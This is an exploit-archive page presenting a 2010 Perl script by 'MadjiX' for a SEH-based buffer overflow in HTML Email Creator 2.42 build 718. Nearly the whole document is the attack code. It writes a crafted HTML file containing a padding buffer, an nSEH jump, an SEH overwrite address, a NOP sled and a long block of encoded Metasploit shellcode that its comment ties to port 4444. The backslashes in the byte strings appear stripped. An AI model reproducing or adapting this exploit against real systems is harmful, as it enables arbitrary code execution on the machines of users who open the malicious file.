[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : HTML Email Creator 2.42 build 718 Buffer Overflow Exploit (SEH)
# Published : 2010-07-29
# Author : MadjiX
# Previous Title : WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow (SEH)
# Next Title : Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Converter Stack Buffer Overflow Exploit
########################################################################################
# _ #
# .-----.--.--.--.----.----.-.---| | #
# | _ | | | | | -__| _ | #
# | __|________|__|__|_____|_____| #
# |__| By MadjiX #
# Sec4ever.com #
########################################################################################
#Title : HTML Email Creator 2.42 build 718 - 0day buffer overflow exploit (SEH) #
#author : MadjiX <Dz8[]Hotmail{}com> #
#Gr33tz : His0k4 , Bibi-info , volc4n0 #
#version 2.3 : http://www.exploit-db.com/exploits/9446/ # by flo flow #
#version 2.1 : http://www.exploit-db.com/exploits/8401/ # by Dun #
########################################################################################
my $file="madjix.html";
my $hd2 ="">n</BODY>n</HTML>n";
my $hd1 ="<HTML>n<HEAD></HEAD>n<BODY>n<img src="" ;
my $buff= "x41" x 56 ;
my $nseh="xebx11x90x90";
my $seh= pack('V',0x753DE4BD);
my $nops="x90" x 24;
# http://www.metasploit.com 4444
my $shellcode =
"x56x54x58x36x33x30x56x58x48x34x39x48x48x48" .
"x50x68x59x41x41x51x68x5ax59x59x59x59x41x41" .
"x51x51x44x44x44x64x33x36x46x46x46x46x54x58" .
"x56x6ax30x50x50x54x55x50x50x61x33x30x31x30" .
"x38x39x49x49x49x49x49x49x49x49x49x49x49x49" .
"x49x49x49x49x49x37x51x5ax6ax41x58x50x30x41" .
"x30x41x6bx41x41x51x32x41x42x32x42x42x30x42" .
"x42x41x42x58x50x38x41x42x75x4ax49x49x6cx4a" .
"x48x4fx79x47x70x47x70x45x50x45x30x4ex69x48" .
"x65x50x31x4ax72x51x74x4cx4bx42x72x44x70x4e" .
"x6bx46x32x44x4cx4cx4bx51x42x45x44x4ex6bx51" .
"x62x47x58x44x4fx48x37x50x4ax46x46x50x31x49" .
"x6fx45x61x4bx70x4ex4cx45x6cx43x51x43x4cx45" .
"x52x46x4cx45x70x49x51x48x4fx44x4dx47x71x4f" .
"x37x48x62x48x70x46x32x42x77x4ex6bx42x72x46" .
"x70x4cx4bx51x52x45x6cx43x31x4ax70x4cx4bx47" .
"x30x50x78x4bx35x49x50x51x64x43x7ax46x61x4a" .
"x70x46x30x4cx4bx47x38x47x68x4ex6bx43x68x47" .
"x50x45x51x4ax73x4ax43x47x4cx51x59x4cx4bx50" .
"x34x4cx4bx47x71x48x56x44x71x49x6fx46x51x4f" .
"x30x4cx6cx49x51x48x4fx44x4dx46x61x4fx37x46" .
"x58x49x70x50x75x49x64x43x33x43x4dx49x68x45" .
"x6bx43x4dx51x34x50x75x4ax42x51x48x4ex6bx50" .
"x58x51x34x43x31x4ax73x43x56x4ex6bx44x4cx42" .
"x6bx4ex6bx51x48x45x4cx47x71x48x53x4ex6bx45" .
"x54x4ex6bx45x51x4ax70x4cx49x51x54x45x74x45" .
"x74x43x6bx51x4bx51x71x50x59x43x6ax46x31x49" .
"x6fx49x70x50x58x43x6fx42x7ax4ex6bx44x52x4a" .
"x4bx4fx76x51x4dx51x78x45x63x50x32x47x70x47" .
"x70x50x68x51x67x44x33x46x52x51x4fx50x54x50" .
"x68x42x6cx50x77x47x56x47x77x4bx4fx4ax75x4e" .
"x58x4ex70x46x61x45x50x47x70x46x49x4fx34x50" .
"x54x46x30x50x68x46x49x4dx50x50x6bx45x50x49" .
"x6fx4bx65x50x50x42x70x42x70x42x70x47x30x50" .
"x50x43x70x46x30x43x58x4ax4ax44x4fx49x4fx4b" .
"x50x4bx4fx48x55x4fx79x49x57x43x58x49x50x4d" .
"x78x47x71x47x71x43x58x46x62x43x30x42x31x51" .
"x4cx4cx49x4dx36x43x5ax46x70x42x76x42x77x45" .
"x38x4ax39x4dx75x44x34x51x71x4bx4fx4ex35x51" .
"x78x43x53x50x6dx45x34x43x30x4bx39x48x63x50" .
"x57x43x67x46x37x50x31x4bx46x51x7ax46x72x42" .
"x79x43x66x4dx32x49x6dx45x36x4fx37x50x44x46" .
"x44x47x4cx46x61x46x61x4cx4dx43x74x44x64x42" .
"x30x4ax66x47x70x51x54x51x44x42x70x46x36x42" .
"x76x51x46x43x76x46x36x50x4ex51x46x43x66x51" .
"x43x50x56x51x78x42x59x48x4cx45x6fx4bx36x49" .
"x6fx4ex35x4ex69x4bx50x50x4ex43x66x51x56x4b" .
"x4fx46x50x50x68x46x68x4ex67x47x6dx45x30x4b" .
"x4fx49x45x4fx4bx4ax50x4cx75x4dx72x43x66x43" .
"x58x4dx76x4ex75x4fx4dx4dx4dx4bx4fx4ax75x47" .
"x4cx43x36x43x4cx44x4ax4dx50x4bx4bx4dx30x43" .
"x45x47x75x4fx4bx50x47x46x73x44x32x50x6fx42" .
"x4ax47x70x46x33x49x6fx4ax75x41x41";
my $m2d="x42" x 500 ;
open(MYFILE,'>>MadjiX.html');
print MYFILE $hd1.$buff.$nseh.$seh.$nops.$shellcode.$m2d.$hd2;
close(MYFILE);